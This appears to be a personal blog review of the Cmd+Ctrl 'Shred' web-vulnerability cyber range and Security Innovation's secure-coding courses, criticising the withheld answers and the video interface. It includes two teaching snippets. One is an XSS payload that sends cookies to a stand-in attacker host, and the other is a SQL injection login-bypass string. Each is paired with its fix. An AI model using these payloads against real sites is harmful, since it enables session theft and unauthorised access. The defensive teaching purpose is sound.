The range provided an excellent assortment of different vulnerabilities to try to exploit, most of the type that exist in real life (indeed, recently I spotted a common one on one site I shop from, when I mistyped my order number into its order tracking form!). The chat support staff were very prompt, although I couldn't figure out some of their hints.


Shred included 3 challenges (maybe more?) that involved solving puzzles (at least one of which scored quite a few points). However, I think the range would have been better without them, as you wouldn't find them on actual websites - they were simply puzzles to solve, not realistic website vulnerabilities. OK perhaps for some fun factor, not so much for learning about web vulnerabilities, particularly as access to the range is time-limited.

The biggest negative in my view is that no model answers are given at the end. If you haven't managed to solve some of the challenges, tough luck, they won't tell you how. A support person said they felt that these ranges could be devalued by "giving away too much", because customers pay to access its ranges. However, I think that view is misconceived.

It depends on how customers use these ranges internally. I believe they would be best used as hands-on training for tech staff (developers, security), but I can't see why previous users would give away the answers to colleagues or indeed people in other organisations, as it defeats the object of trying these ranges. If organisations required staff to achieve a minimum score on these ranges, then yes, that might incentivise "cheating" and disclosure of solutions. But it's not uncommon, and in fact often a good thing, to form teams to solve challenges together and share knowledge. For this and many other reasons, such a requirement would not make sense. And it would make no sense for one customer of Security Innovation to give the answers away to other customers; what would be the purpose of that?

Conversely, it would be very frustrating for someone who had paid to use the range to find out that they would not be told any outstanding answers at the end. If you haven't managed to teach yourself the solutions, you don't know what you don't know; how will you learn if they refuse to fill in the gaps? Security Innovation already impose a condition on the login page that users cannot post public write-ups or answer guides, which they could expand if they wish (though I don't think that's necessary or desirable).

In a similar vein, I think they should at least give hints about the detailed challenges (e.g. "Unsafe file upload" as one challenge), not just categories of challenges. The cheat sheet mentioned a few types of vulnerabilities that I spent too many hours trying to find, and it was only on the last day or two before expiry that I asked on the chat, only to be told Shred didn't actually have those types of vulnerabilities! I appreciate Cmd+Ctrl doesn't want to give too much away, but knowing there's an unsafe file upload issue to try to exploit still doesn't tell you how to exploit it, and it would have saved me so much time particularly given that access to Shred was time-limited. Again, I think paying customers would appreciate more detailed hints so that they can be more targeted and productive in tackling the challenges during the limited time available (and perhaps "Get Hints" would have done that, but access was disabled for this event).

Also, I'm not sure how time-limited access would be for the paid version, but organisations wanting to subscribe should of course check the details and ensure the time period is sufficient for their purposes, as staff also have to do their jobs! (I tried the range during my annual leave).

Final comments

I think it's definitely worth it for organisations to pay for their developers to try these ranges, subject to the negatives mentioned above (and see below for my review of the training courses). These ranges can be more interesting and fun for users, and certainly involve more active learning (looking into various issues in context as part of attempting to exploit those types of vulnerabilities), which research has shown improves understanding, absorption and retention. And of course, gamification is known to increase engagement. Attempting these ranges would help to consolidate knowledge gained during the security training. 

But, as mentioned above, I believe the best approach is to give staff enough time to tackle the ranges, over a reasonable period while the relevant range is open. Don't make staff do this exercise during their weekends or leave, or require each person to reach a minimum score; instead, hold a debrief at the end of the period for staff to discuss the exercise and share their thoughts (and hopefully receive the answers to challenges none of them could solve, so they can learn what they didn't know). I appreciate that leaderboards and rankings can bring out the competitive streak and make some people try harder, but team members need to cooperate with each other, and staff shouldn't be appraised based on their leaderboard ranking (or be required to reach a minimum score). The joint debrief and "howto" at the end is, I feel, the most critical aspect of getting developer teams to work together better in future to reduce, or hopefully eliminate, vulnerabilities in their online applications.

Cmd+Ctrl offers a good variety of ranges with the stats and other features covered above, which seem very up to date in their scope: banking (two), HR portal, social media, mobile/IoT (Android fitness tracker), cryptocurrency exchange, products marketplace, and cloud. I wish I'd had the chance to try the cloud ones! In fact, there now seem to be 3 separate cloud-focused ranges: cloud infrastructure, cloud file storage, and what seems to be a cloud mailing list management app, i.e. both IaaS and SaaS. 


A range that actually allows the user to edit the application code to try to address each vulnerability, then test again for the vulnerability, would be great for developers!

Online training courses

Alongside access to Shred, for those who signed up to the Nov 2021 bootcamp, Security Innovation kindly offered access for 6 weeks to 32 online courses from its full catalog of training courses. I provide some comments on format and functionality first, then end with thoughts on the content.

I took the bootcamp courses, though the vast majority only after I'd finished the Shred range. The information in some of those courses would have helped with the Shred challenges, but not all of them; they are aimed at developers, so to follow them you would still need some prior computing and coding knowledge.

It was great that many courses were based on the Mitre CWE (common weakness enumeration) classifications often used in the security industry, e.g. incorrect authorization (CWE-863) and on the OWASP 2017 top 10 security risks, but I won't list them all here. The topics covered by the bootcamp: fundamentals of application security, secure software development, fundamentals of security testing, testing for execution with unnecessary privileges, testing for incorrect authorization, broken access control, broken authentication, database security fundamentals, testing for injection vulnerabilities, injection and SQL injection, testing for reliance on untrusted inputs in a security decision, testing for open redirect, security misconfiguration, cross site scripting (XSS), essential session management security, sensitive data exposure (e.g. encrypting), deserialization, use of components with known vulnerabilities, logging and monitoring and XML external entities.
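To give a flavour of one of those topics, here's my own minimal sketch (not taken from the course material) of why the XSS courses stress output encoding: reflecting user input into a page unescaped lets it run as markup, while escaping renders it as inert text:

```python
import html

# A classic stored-XSS payload submitted as, say, a product "review":
comment = '<script>new Image().src="https://evil.example/?c="+document.cookie</script>'

# Vulnerable: the input is interpolated into the page as-is, so the
# browser would execute the script and leak the visitor's cookies.
unsafe_page = f"<p>Latest review: {comment}</p>"

# Safe: html.escape() converts the markup characters to entities,
# so the payload displays as harmless text instead of executing.
safe_page = f"<p>Latest review: {html.escape(comment)}</p>"

print("<script>" in unsafe_page)  # True
print("<script>" in safe_page)    # False
```

Real templating engines (Jinja2, Django templates, etc.) do this escaping automatically by default, which is exactly the mitigation the courses recommend.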

Several courses were split logically into one course on the problem and the next on mitigating or testing for it. Personally, I learn best by being told the point, then seeing practical, concrete worked examples, and I would have liked to see more concrete examples of e.g. XSS or SQL injection attacks. A couple were given occasionally, but not enough in my view. (I appreciate some examples can be found by searching online.) 
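For the SQL injection point specifically, the kind of worked example I mean can fit in a dozen lines. This is my own sketch using Python's built-in sqlite3 (not an example from the courses): the string-built query lets crafted input rewrite the query's logic, while the parameterised version treats the same input as plain data:

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (name TEXT, password TEXT)")
conn.execute("INSERT INTO users VALUES ('alice', 's3cret')")

payload = "' OR '1'='1"  # classic injection string typed into a login form

# Vulnerable: concatenating user input into the SQL text means the
# OR clause makes the WHERE condition true for every row.
unsafe_sql = f"SELECT name FROM users WHERE password = '{payload}'"
rows_unsafe = conn.execute(unsafe_sql).fetchall()

# Safe: a parameterised query passes the input as data, never as SQL.
rows_safe = conn.execute(
    "SELECT name FROM users WHERE password = ?", (payload,)
).fetchall()

print(rows_unsafe)  # [('alice',)] - authentication bypassed
print(rows_safe)    # [] - no user's password is the literal payload
```

Seeing both queries side by side, with the same input, makes the mitigation (always use placeholders, never string-build SQL) stick far better than a definition alone.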

The above shows Completed but a course's status could also be displayed as being in progress. You need to click against a particular course (where it shows Completed above) to enrol in the first place, an extra step whose purpose I couldn't fathom (why not just "Start"?). The 3 dots "action menu" enables you to copy the direct link to a particular course for sharing, or pin individual courses.

Clicking on a course name takes you to a launch page, from where you can also open a PDF of the text transcription of the audio.

You can leave a course part-completed, and resume later: 

When you launch or resume a course, a video appears for playing. There are 3 icons on the top right, above the video, for a glossary (the book), help regarding how to use the video (the question mark), and the text version of the course (printer icon). 


The courses cater for people with different learning styles, by providing both videos and PDF transcriptions. Personally, I scan text a zillion times faster than if I had to watch a video linearly at the slower pace at which people speak, so for learning I much prefer text over video (plus the ability to ask questions, but I didn't see a chat icon - I don't know if that's possible with the paid version?). So, I always clicked the printer icon to read the PDF (opens in another tab) rather than watch the video.

A TOC button on the bottom right brings up a table of contents on the left, where you can click to go straight to a particular section of the video. It also shows progress, with a tick against the sections that you've watched. 

Another positive, from an accessibility perspective: the CC (closed captions) button at the bottom right brings up the text transcript for the current part of the video, synchronised to the audio. 


The PDF didn't always show all the slides from the video, especially in the first few courses - not all the slides contained substantive content, but some slides with example URLs or code were missing from the PDF version. So, personally, I only played the videos to check for any useful slides missing from the PDFs. 

If you play a video, it stops occasionally and you have to click the play button again to start the next section, which may not be obvious. Sometimes it stops to provide interactivity, i.e. the user has to click on one part of the slide to learn about that issue, click on another part to learn about another issue, etc. I hate these types of features, myself. I would prefer videos to just play continuously, moving from section to section, unless and until the user pauses them. Stopping a video to force the user to click on something just to get to the next portion seems popular, particularly with the periodic online staff training that many are compelled to undergo for regulatory compliance reasons, but really it's not the same as active learning, in my view! Forced stops like these just break the train of thought and get in the way, when the user wants to get a move on. But perhaps this is a matter of personal preference, so allow me my rant about "interactive" online training courses!


At the end of a video, you can take an exam (and there are also Knowledge Check quizzes to answer throughout the video). As I had scanned the PDFs rather than watch the videos, I generally went straight to the exam via the TOC or by dragging the position arrow. 

If you pass an exam, you get a certificate of completion that you can download under the Transcripts section of the site, which also allows printing of the list of courses and marks (niggle: all certificate PDFs had the same filename, it would be great if certificate filenames followed the course name, and if you could download a single zipped file of all certificates in one go). 

You're allowed to take the exam multiple times until you pass. Most exams comprise about 4-5 questions, although one had 3, a few 6-8, and another 12 questions. They estimate it takes about 5 mins per exam (10 mins sometimes), which I found was about right. 

It doesn't seem possible to go back and amend your answer if you change your mind about a previous question - when I tried to do that in one exam, it threw a fit and I ended up having to retake the exam (with the same answers) twice before it would register as completed.


At the end of the exam, your full results are shown (it doesn't show results per question as you go through):


The obvious answer is usually the right one, and if you think "Yes, but only if..", then the answer is probably "No"! I felt a few of the questions or multiple-choice answers were unclearly or ambiguously phrased. I also thought some questions were more about categorising vulnerabilities by type (e.g. broken authentication), or about the vulnerabilities themselves, than about how to mitigate them.

If you didn't pass, you can click Review Exam to see where you went wrong, which is helpful. I only had to retake one to pass (because of the No answer above when I had answered Yes!), but didn't bother to retake a few others where I'd passed with less than 100%.

I discovered that I actually knew more than I thought I did, so the courses didn't actually help me with Shred (although the support staff tips did). But I still learned some useful things that I didn't already know, and I strongly recommend that those without the necessary foundation should take these courses before trying the ranges.

Final thoughts

Overall, I would recommend the Cmd+Ctrl ranges as an excellent way for developers and security staff to learn about online application vulnerabilities, subject to taking the courses first for those without the prior knowledge. They really are aimed at developers/programmers, so most lawyers may struggle, even tech lawyers. I do think it's helpful for lawyers to have a basic knowledge of the common vulnerabilities and how they are exploited and mitigated when discussing cybersecurity measures and breaches with clients that have suffered incidents, but you probably don't need to tackle the courses or ranges to gain that knowledge.

Thanks very much again to Security Innovation for making Shred and the courses available for the OWASP London CTF 2021 event!

(I wrote this back in Dec 2021 but for various reasons couldn't publish it till now.)